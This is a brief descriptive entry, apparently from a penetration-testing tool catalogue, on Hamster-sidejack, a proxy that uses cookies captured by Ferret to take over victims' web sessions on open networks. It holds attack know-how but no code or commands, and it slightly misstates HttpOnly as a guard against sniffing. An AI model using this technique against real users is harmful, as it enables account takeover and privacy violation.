Hamster Sidejack

Hamster-sidejack is a specialized tool for session hijacking, known as 'sidejacking'. It functions as a proxy server that intercepts and swaps session cookies, enabling attackers to impersonate users by taking over their active web sessions. This tool is particularly useful in scenarios where an attacker has access to network traffic containing unencrypted cookies, such as on open Wi-Fi networks.

The primary use case involves combining Hamster with cookie-sniffing tools like Ferret to capture session tokens from victims. Once obtained, Hamster's proxy capability allows seamless takeover of the victim's authenticated sessions without needing their credentials. This technique bypasses login mechanisms for websites that do not enforce secure cookie attributes like HttpOnly or Secure flags.

Hamster requires Ferret for the sniffing component, making it part of a broader toolkit for man-in-the-middle attacks. It is lightweight, with an installed size of 154 KB, and is available in Kali Linux repositories for easy deployment in penetration testing environments.

Hamster operates as a proxy server listening on a specified port, such as 127.0.0.1:1234. Users configure their browser to route traffic through this proxy. The tool replaces the browser's cookies with session cookies previously stolen via Ferret, which sniffs network traffic for unencrypted cookie data. Internally, it initializes listening ports, manages proxy threads, and performs cookie substitution during HTTP requests, enabling transparent session hijacking over protocols like HTTP.